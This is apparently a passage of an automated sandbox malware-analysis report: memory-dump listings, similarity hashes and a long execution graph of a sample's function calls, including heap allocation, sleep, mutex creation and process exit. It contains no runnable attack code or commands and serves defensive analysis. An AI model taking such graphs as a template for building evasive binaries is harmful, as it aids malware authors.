                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758847335.00000000008C5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758863602.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758880113.00000000008C7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758988832.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759006705.0000000000A23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759031975.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759031975.0000000000A49000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759077688.0000000000A4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759099138.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759119254.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759135222.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759152937.0000000000A50000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759170379.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759191927.0000000000A64000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759208782.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759227993.0000000000A74000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759246571.0000000000A75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759265870.0000000000A80000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759285147.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759313909.0000000000AB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759332810.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759350409.0000000000AB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759368234.0000000000ABD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759386499.0000000000ABE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759406553.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759425441.0000000000ACB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759443643.0000000000ACF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759461082.0000000000AD0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759478994.0000000000AD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759500180.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759517673.0000000000AE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759517673.0000000000B27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759573056.0000000000B3E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759591946.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759610705.0000000000B55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759633764.0000000000B56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759651909.0000000000B57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759670977.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759689172.0000000000B5F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759710977.0000000000B6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759729050.0000000000B6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_850000_file.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Mtx_unlock
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1418687624-0
                                                                                                                                                                                                                                                                • Opcode ID: 655adaa5f57e0e1e5c67fa756c4031801738c3d6c0971db7508e15bd17e507b9
                                                                                                                                                                                                                                                                • Instruction ID: a5238d0e5661b87a5e8927741075090069a0f1a8443c01432fb28a42f51e61ab
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 655adaa5f57e0e1e5c67fa756c4031801738c3d6c0971db7508e15bd17e507b9
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FAA1C0B0A01715AFDB20DB79C944B6AB7A8FF15356F048129EC15D7281EB35EA08CBD2

                                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                                Execution Coverage:1%
                                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                                                                                                Total number of Nodes:1875
                                                                                                                                                                                                                                                                Total number of Limit Nodes:9
                                                                                                                                                                                                                                                                execution_graph 9934 9a5a9e 9936 9a5a61 9934->9936 9935 9b80c0 RtlAllocateHeap 9935->9936 9936->9934 9936->9935 9939 9a5bdd std::future_error::future_error 9936->9939 9940 9b7a00 9936->9940 9954 9a5730 9936->9954 9941 9b7a26 9940->9941 9942 9b7a2d 9941->9942 9943 9b7a62 9941->9943 9944 9b7a81 9941->9944 9942->9936 9945 9b7ab9 9943->9945 9946 9b7a69 9943->9946 9948 9bd3e2 RtlAllocateHeap 9944->9948 9952 9b7a76 __cftof 9944->9952 9949 9a2480 RtlAllocateHeap 9945->9949 9947 9bd3e2 RtlAllocateHeap 9946->9947 9950 9b7a6f 9947->9950 9948->9952 9949->9950 9951 9d6c6a RtlAllocateHeap 9950->9951 9950->9952 9953 9b7ac3 __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ __Cnd_unregister_at_thread_exit 9951->9953 9952->9936 9953->9936 9958 9a5860 shared_ptr 9954->9958 9962 9a5799 shared_ptr 9954->9962 9955 9a592a 9963 9b8200 9955->9963 9956 9b80c0 RtlAllocateHeap 9956->9962 9959 9d6c6a RtlAllocateHeap 9958->9959 9961 9a5900 shared_ptr std::future_error::future_error 9958->9961 9960 9a5934 9959->9960 9961->9936 9962->9955 9962->9956 9962->9958 9966 9bc1d9 9963->9966 9965 9b820a 9969 9bc15d 9966->9969 9968 9bc1ea Concurrency::cancel_current_task 9968->9965 9970 9a22e0 std::future_error::future_error RtlAllocateHeap 9969->9970 9971 9bc16f 9970->9971 9971->9968 9972 9a2090 9975 9bd64e 9972->9975 9978 9bd621 9975->9978 9979 9bd630 9978->9979 9980 9bd637 9978->9980 9984 9d988e 9979->9984 9987 9d98fa 9980->9987 9983 9a209a 9985 9d98fa RtlAllocateHeap 9984->9985 9986 9d98a0 9985->9986 9986->9983 9990 9d9630 9987->9990 9989 9d992b 9989->9983 9991 9d963c __dosmaperr 9990->9991 9994 9d968b 9991->9994 9993 9d9657 9993->9989 9995 9d96a7 9994->9995 9997 9d971e __dosmaperr 9994->9997 9996 9d96fe 9995->9996 9995->9997 10004 9dedf6 9995->10004 9996->9997 9999 9dedf6 RtlAllocateHeap 9996->9999 9997->9993 10001 9d9714 9999->10001 10000 9d96f4 10002 9dadf5 ___free_lconv_mon RtlAllocateHeap 10000->10002 10003 9dadf5 ___free_lconv_mon RtlAllocateHeap 10001->10003 10002->9996 10003->9997 10005 9dee03 10004->10005 10007 9dee1e 10004->10007 10006 9dee0f 10005->10006 10005->10007 10009 9d75f6 __dosmaperr RtlAllocateHeap 10006->10009 10008 9dee2d 10007->10008 10013 9e4fdc 10007->10013 10020 9e500f 10008->10020 10012 9dee14 __cftof 10009->10012 10012->10000 10014 9e4ffc 10013->10014 10015 9e4fe7 10013->10015 10014->10008 10016 9d75f6 __dosmaperr RtlAllocateHeap 10015->10016 10017 9e4fec 10016->10017 10018 9d6c5a __cftof RtlAllocateHeap 10017->10018 10019 9e4ff7 10018->10019 10019->10008 10021 9e501c 10020->10021 10022 9e5027 10020->10022 10029 9db04b 10021->10029 10024 9e502f 10022->10024 10028 9e5038 __dosmaperr 10022->10028 10025 9dadf5 ___free_lconv_mon RtlAllocateHeap 10024->10025 10027 9e5024 10025->10027 10026 9d75f6 __dosmaperr RtlAllocateHeap 10026->10027 10027->10012 10028->10026 10028->10027 10031 9db059 __dosmaperr 10029->10031 10030 9d75f6 __dosmaperr RtlAllocateHeap 10032 9db087 10030->10032 10031->10030 10031->10032 10032->10027 10037 9a3c8e 10038 9a3c98 10037->10038 10043 9a3cb4 10038->10043 10056 9a2410 10038->10056 10071 9a3810 10043->10071 10057 9a2424 10056->10057 10075 9bb52d 10057->10075 10060 9a3ce0 10061 9a3d42 10060->10061 10063 9a3d52 10060->10063 10177 9b7d50 10061->10177 10064 9bd3e2 RtlAllocateHeap 10063->10064 10065 9a3d84 10064->10065 10066 9b7d50 RtlAllocateHeap 10065->10066 10068 9a3e03 10065->10068 10066->10068 10067 9a3e9b shared_ptr 10067->10043 10068->10067 10069 9d6c6a RtlAllocateHeap 10068->10069 10070 9a3ec1 10069->10070 10072 9a381c 10071->10072 10209 9a2440 10072->10209 10083 9d3aed 10075->10083 10077 9a242a 10077->10060 10078 9bb5a5 ___std_exception_copy 10090 9bb1ad 10078->10090 10079 9bb598 10086 9baf56 10079->10086 10094 9d4f29 10083->10094 10085 9bb555 10085->10077 10085->10078 10085->10079 10087 9baf9f ___std_exception_copy 10086->10087 10089 9bafb2 shared_ptr 10087->10089 10153 9bb39f 10087->10153 10089->10077 10091 9bb1d8 10090->10091 10093 9bb1e1 shared_ptr 10090->10093 10092 9bb39f 5 API calls 10091->10092 10092->10093 10093->10077 10101 9d4f37 10094->10101 10096 9d4f2e __cftof 10096->10085 10099 9d8bfc __cftof 10096->10099 10106 9dd634 10096->10106 10127 9d65ed 10099->10127 10102 9d4f40 10101->10102 10103 9d4f43 10101->10103 10102->10096 10104 9d8ba3 ___std_exception_destroy RtlAllocateHeap 10103->10104 10105 9d4f77 10103->10105 10104->10105 10105->10096 10107 9dd640 __dosmaperr 10106->10107 10108 9da7c8 __dosmaperr RtlAllocateHeap 10107->10108 10112 9dd667 __cftof 10107->10112 10114 9dd66d __cftof __dosmaperr 10107->10114 10108->10112 10109 9dd6b2 10110 9d75f6 __dosmaperr RtlAllocateHeap 10109->10110 10111 9dd6b7 10110->10111 10113 9d6c5a __cftof RtlAllocateHeap 10111->10113 10112->10109 10112->10114 10126 9dd69c 10112->10126 10113->10126 10115 9dd81b __dosmaperr 10114->10115 10116 9dd726 10114->10116 10118 9dd751 __cftof 10114->10118 10117 9d65ed __cftof 3 API calls 10115->10117 10116->10118 10130 9dd62b 10116->10130 10119 9dd82e 10117->10119 10124 9dd7a5 10118->10124 10118->10126 10133 9da671 10118->10133 10123 9dd62b __cftof 4 API calls 10123->10118 10125 9da671 __cftof 4 API calls 10124->10125 10124->10126 10125->10126 10126->10099 10128 9d64c7 __cftof 3 API calls 10127->10128 10129 9d65fe 10128->10129 10131 9da671 __cftof 4 API calls 10130->10131 10132 9dd630 10131->10132 10132->10123 10134 9da67b __dosmaperr 10133->10134 10135 9dd82f __dosmaperr RtlAllocateHeap 10134->10135 10136 9da694 10134->10136 10138 9da6bc __dosmaperr 10135->10138 10137 9da722 10136->10137 10147 9d8bec 10136->10147 10137->10124 10140 9da6fc 10138->10140 10141 9da6c4 __dosmaperr 10138->10141 10142 9da49f __dosmaperr RtlAllocateHeap 10140->10142 10143 9dadf5 ___free_lconv_mon RtlAllocateHeap 10141->10143 10145 9da707 10142->10145 10143->10136 10146 9dadf5 ___free_lconv_mon RtlAllocateHeap 10145->10146 10146->10136 10148 9d8bf1 __cftof 10147->10148 10149 9dd634 __cftof 4 API calls 10148->10149 10152 9d8bfc __cftof 10148->10152 10149->10152 10150 9d65ed __cftof 3 API calls 10151 9d8c2f 10150->10151 10152->10150 10164 9bbedf 10153->10164 10156 9bb3e8 10156->10089 10173 9bcc31 10164->10173 10167 9d6cbb 10168 9d6cc7 __dosmaperr 10167->10168 10169 9da671 __cftof 4 API calls 10168->10169 10172 9d6ccc 10169->10172 10170 9d8bec __cftof 4 API calls 10171 9d6cf6 10170->10171 10172->10170 10174 9bcc3f InitOnceExecuteOnce 10173->10174 10176 9bb3e1 10173->10176 10174->10176 10176->10156 10176->10167 10178 9b7dcb 10177->10178 10179 9b7d62 10177->10179 10180 9a2480 RtlAllocateHeap 10178->10180 10181 9b7d6d 10179->10181 10182 9b7d9c 10179->10182 10184 9b7d7a 10180->10184 10181->10178 10185 9b7d74 10181->10185 10183 9b7db9 10182->10183 10186 9bd3e2 RtlAllocateHeap 10182->10186 10183->10063 10187 9d6c6a RtlAllocateHeap 10184->10187 10190 9b7d83 10184->10190 10188 9bd3e2 RtlAllocateHeap 10185->10188 10189 9b7da6 10186->10189 10195 9b7dd5 10187->10195 10188->10184 10189->10063 10190->10063 10191 9b7f20 10192 9b9270 RtlAllocateHeap 10191->10192 10205 9b7e91 __cftof 10192->10205 10193 9b7e01 10193->10063 10194 9b7f1b 10199 9a2480 RtlAllocateHeap 10194->10199 10195->10191 10195->10193 10195->10194 10197 9b7e80 10195->10197 10198 9b7ea7 10195->10198 10196 9d6c6a RtlAllocateHeap 10204 9b7f2a __cftof 10196->10204 10197->10194 10200 9b7e8b 10197->10200 10202 9bd3e2 RtlAllocateHeap 10198->10202 10198->10205 10199->10191 10201 9bd3e2 RtlAllocateHeap 10200->10201 10201->10205 10202->10205 10203 9b7f61 shared_ptr 10203->10063 10204->10203 10207 9d6c6a RtlAllocateHeap 10204->10207 10205->10196 10206 9b7f02 shared_ptr 10205->10206 10206->10063 10208 9b7f7c 10207->10208 10212 9bb5d6 10209->10212 10211 9a2472 10214 9bb5f1 Concurrency::cancel_current_task 10212->10214 10213 9d8bec __cftof 4 API calls 10215 9bb69f 10213->10215 10214->10213 10216 9bb658 __cftof std::future_error::future_error 10214->10216 10216->10211 10217 9aa682 10218 9aa68a shared_ptr 10217->10218 10219 9aa949 10218->10219 10220 9aa75d shared_ptr 10218->10220 10221 9d6c6a RtlAllocateHeap 10219->10221 10224 9b80c0 RtlAllocateHeap 10220->10224 10222 9aa94e 10221->10222 10223 9d6c6a RtlAllocateHeap 10222->10223 10225 9aa953 Sleep CreateMutexA 10223->10225 10226 9aa903 10224->10226 10227 9aa98e 10225->10227 10268 9b8680 10269 9b86e0 10268->10269 10269->10269 10277 9b7760 10269->10277 10271 9b86f9 10273 9b8714 10271->10273 10291 9b8f40 10271->10291 10274 9b8f40 RtlAllocateHeap 10273->10274 10276 9b8769 10273->10276 10275 9b87b1 10274->10275 10280 9b777b 10277->10280 10290 9b7864 shared_ptr __cftof 10277->10290 10278 9b77fb __cftof 10289 9d6c6a RtlAllocateHeap 10278->10289 10278->10290 10279 9b78f1 10281 9b9270 RtlAllocateHeap 10279->10281 10280->10278 10280->10279 10284 9b77ea 10280->10284 10285 9b7811 10280->10285 10280->10290 10282 9b78f6 10281->10282 10283 9a2480 RtlAllocateHeap 10282->10283 10286 9b78fb 10283->10286 10284->10282 10288 9bd3e2 RtlAllocateHeap 10284->10288 10285->10278 10287 9bd3e2 RtlAllocateHeap 10285->10287 10287->10278 10288->10278 10289->10279 10290->10271 10292 9b8f6b 10291->10292 10293 9b908e 10291->10293 10297 9b8fdc 10292->10297 10298 9b8fb2 10292->10298 10294 9b9270 RtlAllocateHeap 10293->10294 10295 9b9093 10294->10295 10296 9a2480 RtlAllocateHeap 10295->10296 10299 9b8fc3 __cftof 10296->10299 10297->10299 10301 9bd3e2 RtlAllocateHeap 10297->10301 10298->10295 10300 9b8fbd 10298->10300 10302 9d6c6a RtlAllocateHeap 10299->10302 10304 9b904c shared_ptr __cftof 10299->10304 10303 9bd3e2 RtlAllocateHeap 10300->10303 10301->10299 10305 9b909d 10302->10305 10303->10299 10304->10273 10306 9b90be 10305->10306 10307 9b90b8 10305->10307 10309 9a2480 Concurrency::cancel_current_task 10305->10309 10306->10273 10308 9bd3e2 RtlAllocateHeap 10307->10308 10308->10306 10310 9d38af ___std_exception_copy RtlAllocateHeap 10309->10310 10311 9a24c3 10310->10311 10311->10273 10312 9a9ab8 10314 9a9acc 10312->10314 10315 9a9b08 10314->10315 10316 9a9b4b shared_ptr 10315->10316 10320 9aa917 10315->10320 10317 9a9b59 10316->10317 10318 9a9b65 10316->10318 10324 9b80c0 RtlAllocateHeap 10317->10324 10319 9b7a00 RtlAllocateHeap 10318->10319 10323 9a9b74 10319->10323 10321 9aa953 Sleep CreateMutexA 10320->10321 10322 9d6c6a RtlAllocateHeap 10320->10322 10328 9aa98e 10321->10328 10322->10321 10341 9a5c10 10323->10341 10326 9aa903 10324->10326 10327 9a9b7c 10392 9a8b30 10327->10392 10330 9a9b8d 10429 9b8220 10330->10429 10332 9a9b9c 10333 9b7a00 RtlAllocateHeap 10332->10333 10334 9a9ca9 10333->10334 10335 9a5c10 4 API calls 10334->10335 10336 9a9cb1 10335->10336 10337 9a8b30 4 API calls 10336->10337 10338 9a9cc2 10337->10338 10339 9b8220 RtlAllocateHeap 10338->10339 10340 9a9cd1 10339->10340 10437 9a5940 10341->10437 10343 9a5c54 10440 9a4b30 10343->10440 10345 9a5d17 shared_ptr std::future_error::future_error 10345->10327 10346 9a5c7b shared_ptr 10346->10345 10347 9d6c6a RtlAllocateHeap 10346->10347 10348 9a5d47 __cftof 10347->10348 10348->10348 10349 9b80c0 RtlAllocateHeap 10348->10349 10351 9a5e3e 10349->10351 10350 9a5ea6 shared_ptr std::future_error::future_error 10350->10327 10351->10350 10352 9d6c6a RtlAllocateHeap 10351->10352 10353 9a5ed2 10352->10353 10354 9a5ffe shared_ptr std::future_error::future_error 10353->10354 10355 9d6c6a RtlAllocateHeap 10353->10355 10354->10327 10356 9a601b 10355->10356 10357 9b80c0 RtlAllocateHeap 10356->10357 10358 9a6089 10357->10358 10359 9b80c0 RtlAllocateHeap 10358->10359 10360 9a60bd 10359->10360 10361 9b80c0 RtlAllocateHeap 10360->10361 10362 9a60ee 10361->10362 10363 9b80c0 RtlAllocateHeap 10362->10363 10364 9a611f 10363->10364 10365 9b80c0 RtlAllocateHeap 10364->10365 10367 9a6150 10365->10367 10366 9a65b1 shared_ptr std::future_error::future_error 10366->10327 10367->10366 10368 9d6c6a RtlAllocateHeap 10367->10368 10369 9a65dc 10368->10369 10370 9b7a00 RtlAllocateHeap 10369->10370 10371 9a66a6 10370->10371 10372 9a5c10 4 API calls 10371->10372 10373 9a66ac 10372->10373 10374 9a5c10 4 API calls 10373->10374 10375 9a66b1 10374->10375 10447 9a22c0 10375->10447 10377 9a66c9 shared_ptr 10378 9b7a00 RtlAllocateHeap 10377->10378 10379 9a6732 10378->10379 10380 9a5c10 4 API calls 10379->10380 10381 9a673d 10380->10381 10382 9a22c0 4 API calls 10381->10382 10391 9a6757 shared_ptr 10382->10391 10383 9a6852 10384 9b80c0 RtlAllocateHeap 10383->10384 10386 9a689c 10384->10386 10385 9b7a00 RtlAllocateHeap 10385->10391 10387 9b80c0 RtlAllocateHeap 10386->10387 10390 9a68e3 shared_ptr std::future_error::future_error 10387->10390 10388 9a5c10 4 API calls 10388->10391 10389 9a22c0 4 API calls 10389->10391 10390->10327 10391->10383 10391->10385 10391->10388 10391->10389 10393 9a8b7c 10392->10393 10394 9b7a00 RtlAllocateHeap 10393->10394 10395 9a8b8c 10394->10395 10396 9a5c10 4 API calls 10395->10396 10397 9a8b97 10396->10397 10398 9b80c0 RtlAllocateHeap 10397->10398 10399 9a8be3 10398->10399 10400 9b80c0 RtlAllocateHeap 10399->10400 10401 9a8c35 10400->10401 10402 9b8220 RtlAllocateHeap 10401->10402 10405 9a8c47 shared_ptr 10402->10405 10403 9a8d01 shared_ptr std::future_error::future_error 10403->10330 10404 9d6c6a RtlAllocateHeap 10406 9a8d2d 10404->10406 10405->10403 10405->10404 10407 9b7a00 RtlAllocateHeap 10406->10407 10408 9a8d8f 10407->10408 10409 9a5c10 4 API calls 10408->10409 10410 9a8d9a 10409->10410 10411 9b80c0 RtlAllocateHeap 10410->10411 10412 9a8dec 10411->10412 10413 9b8220 RtlAllocateHeap 10412->10413 10414 9a8dfe shared_ptr 10413->10414 10415 9a8e7e shared_ptr std::future_error::future_error 10414->10415 10416 9d6c6a RtlAllocateHeap 10414->10416 10415->10330 10417 9a8eaa 10416->10417 10418 9b7a00 RtlAllocateHeap 10417->10418 10419 9a8f0f 10418->10419 10420 9a5c10 4 API calls 10419->10420 10421 9a8f1a 10420->10421 10422 9b80c0 RtlAllocateHeap 10421->10422 10423 9a8f6c 10422->10423 10424 9b8220 RtlAllocateHeap 10423->10424 10426 9a8f7e shared_ptr 10424->10426 10425 9a8ffe shared_ptr std::future_error::future_error 10425->10330 10426->10425 10427 9d6c6a RtlAllocateHeap 10426->10427 10428 9a902a 10427->10428 10430 9b8248 10429->10430 10434 9b8292 10429->10434 10431 9b8251 10430->10431 10430->10434 10798 9b9280 10431->10798 10433 9b82a1 10433->10332 10434->10433 10436 9b8f40 RtlAllocateHeap 10434->10436 10435 9b825a 10435->10332 10436->10433 10450 9b7f80 10437->10450 10439 9a596b 10439->10343 10441 9a4dc2 10440->10441 10445 9a4b92 10440->10445 10441->10346 10443 9a4ce5 10443->10441 10444 9b8ca0 RtlAllocateHeap 10443->10444 10444->10443 10445->10443 10465 9d6da6 10445->10465 10470 9b8ca0 10445->10470 10595 9a2280 10447->10595 10454 9b7f9e __cftof 10450->10454 10455 9b7fc7 10450->10455 10451 9b80b3 10452 9b9270 RtlAllocateHeap 10451->10452 10453 9b80b8 10452->10453 10456 9a2480 RtlAllocateHeap 10453->10456 10454->10439 10455->10451 10457 9b801b 10455->10457 10458 9b803e 10455->10458 10459 9b80bd 10456->10459 10457->10453 10461 9bd3e2 RtlAllocateHeap 10457->10461 10460 9bd3e2 RtlAllocateHeap 10458->10460 10462 9b802c __cftof 10458->10462 10460->10462 10461->10462 10463 9b8095 shared_ptr 10462->10463 10464 9d6c6a RtlAllocateHeap 10462->10464 10463->10439 10464->10451 10466 9d6db4 10465->10466 10467 9d6dc2 10465->10467 10485 9d6d19 10466->10485 10467->10445 10471 9b8dc9 10470->10471 10472 9b8cc3 10470->10472 10473 9b9270 RtlAllocateHeap 10471->10473 10476 9b8d2f 10472->10476 10477 9b8d05 10472->10477 10474 9b8dce 10473->10474 10475 9a2480 RtlAllocateHeap 10474->10475 10483 9b8d16 __cftof 10475->10483 10479 9bd3e2 RtlAllocateHeap 10476->10479 10476->10483 10477->10474 10478 9b8d10 10477->10478 10481 9bd3e2 RtlAllocateHeap 10478->10481 10479->10483 10480 9d6c6a RtlAllocateHeap 10482 9b8dd8 10480->10482 10481->10483 10483->10480 10484 9b8d8b shared_ptr __cftof 10483->10484 10484->10445 10490 9d690a 10485->10490 10489 9d6d3d 10489->10445 10491 9d692a 10490->10491 10497 9d6921 10490->10497 10492 9da671 __cftof 4 API calls 10491->10492 10491->10497 10493 9d694a 10492->10493 10504 9db5fb 10493->10504 10498 9d6d52 10497->10498 10499 9d6d8f 10498->10499 10500 9d6d5f 10498->10500 10579 9db67d 10499->10579 10503 9d6d6e 10500->10503 10574 9db6a1 10500->10574 10503->10489 10505 9d6960 10504->10505 10506 9db60e 10504->10506 10508 9db628 10505->10508 10506->10505 10512 9df5ab 10506->10512 10509 9db63b 10508->10509 10510 9db650 10508->10510 10509->10510 10525 9de6b1 10509->10525 10510->10497 10513 9df5b7 __dosmaperr 10512->10513 10514 9da671 __cftof 4 API calls 10513->10514 10515 9df5c0 __dosmaperr 10514->10515 10518 9df606 10515->10518 10521 9df62c 10515->10521 10517 9df5ef __cftof 10517->10518 10519 9d8bec __cftof 4 API calls 10517->10519 10518->10505 10520 9df62b 10519->10520 10522 9df63a __dosmaperr 10521->10522 10524 9df647 10521->10524 10523 9df35f __dosmaperr RtlAllocateHeap 10522->10523 10522->10524 10523->10524 10524->10517 10526 9da671 __cftof 4 API calls 10525->10526 10527 9de6bb 10526->10527 10530 9de5c9 10527->10530 10529 9de6c1 10529->10510 10534 9de5d5 __dosmaperr 10530->10534 10531 9de5f6 10531->10529 10532 9de5ef __cftof 10532->10531 10533 9d8bec __cftof 4 API calls 10532->10533 10535 9de668 10533->10535 10534->10532 10538 9dadf5 ___free_lconv_mon RtlAllocateHeap 10534->10538 10536 9de6a4 10535->10536 10541 9da72e 10535->10541 10536->10529 10538->10532 10542 9da739 __dosmaperr 10541->10542 10544 9dd82f __dosmaperr RtlAllocateHeap 10542->10544 10546 9da745 10542->10546 10543 9d8bec __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 10545 9da7c7 10543->10545 10548 9da769 __dosmaperr 10544->10548 10546->10543 10547 9da7be 10546->10547 10555 9de4b0 10547->10555 10549 9da7a5 10548->10549 10550 9da771 __dosmaperr 10548->10550 10552 9da49f __dosmaperr RtlAllocateHeap 10549->10552 10551 9dadf5 ___free_lconv_mon RtlAllocateHeap 10550->10551 10551->10546 10553 9da7b0 10552->10553 10554 9dadf5 ___free_lconv_mon RtlAllocateHeap 10553->10554 10554->10546 10556 9de5c9 __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 10555->10556 10557 9de4c3 10556->10557 10558 9de259 __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 10557->10558 10559 9de4cb 10558->10559 10560 9de4dc 10559->10560 10561 9db04b __cftof RtlAllocateHeap 10559->10561 10560->10536 10562 9de4ed 10561->10562 10563 9de51f 10562->10563 10564 9de6c4 __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 10562->10564 10566 9dadf5 ___free_lconv_mon RtlAllocateHeap 10563->10566 10565 9de512 10564->10565 10567 9de51a 10565->10567 10571 9de535 __cftof 10565->10571 10568 9de52d 10566->10568 10569 9d75f6 __dosmaperr RtlAllocateHeap 10567->10569 10568->10536 10569->10563 10570 9de561 10570->10563 10573 9de14b __cftof RtlAllocateHeap 10570->10573 10571->10570 10572 9dadf5 ___free_lconv_mon RtlAllocateHeap 10571->10572 10572->10570 10573->10563 10575 9d690a __cftof 4 API calls 10574->10575 10576 9db6be 10575->10576 10578 9db6ce std::future_error::future_error 10576->10578 10584 9df1bf 10576->10584 10578->10503 10580 9da671 __cftof 4 API calls 10579->10580 10581 9db688 10580->10581 10582 9db5fb __cftof 4 API calls 10581->10582 10583 9db698 10582->10583 10583->10503 10585 9d690a __cftof 4 API calls 10584->10585 10586 9df1df __cftof 10585->10586 10587 9db04b __cftof RtlAllocateHeap 10586->10587 10588 9df29d std::future_error::future_error 10586->10588 10590 9df232 __cftof 10586->10590 10587->10590 10588->10578 10591 9df2c2 10590->10591 10592 9df2ce 10591->10592 10593 9df2df 10591->10593 10592->10593 10594 9dadf5 ___free_lconv_mon RtlAllocateHeap 10592->10594 10593->10588 10594->10593 10596 9a2296 10595->10596 10599 9d87f8 10596->10599 10602 9d7609 10599->10602 10601 9a22a4 10601->10377 10603 9d7649 10602->10603 10604 9d7631 10602->10604 10603->10604 10606 9d7651 10603->10606 10605 9d75f6 __dosmaperr RtlAllocateHeap 10604->10605 10608 9d7636 10605->10608 10607 9d690a __cftof 4 API calls 10606->10607 10610 9d7661 10607->10610 10609 9d6c5a __cftof RtlAllocateHeap 10608->10609 10611 9d7641 std::future_error::future_error 10609->10611 10615 9d7bc4 10610->10615 10611->10601 10631 9d868d 10615->10631 10617 9d76e8 10628 9d7a19 10617->10628 10618 9d7be4 10619 9d75f6 __dosmaperr RtlAllocateHeap 10618->10619 10620 9d7be9 10619->10620 10621 9d6c5a __cftof RtlAllocateHeap 10620->10621 10621->10617 10622 9d7bd5 10622->10617 10622->10618 10638 9d7d15 10622->10638 10646 9d8168 10622->10646 10651 9d7dc2 10622->10651 10656 9d7de8 10622->10656 10685 9d7f36 10622->10685 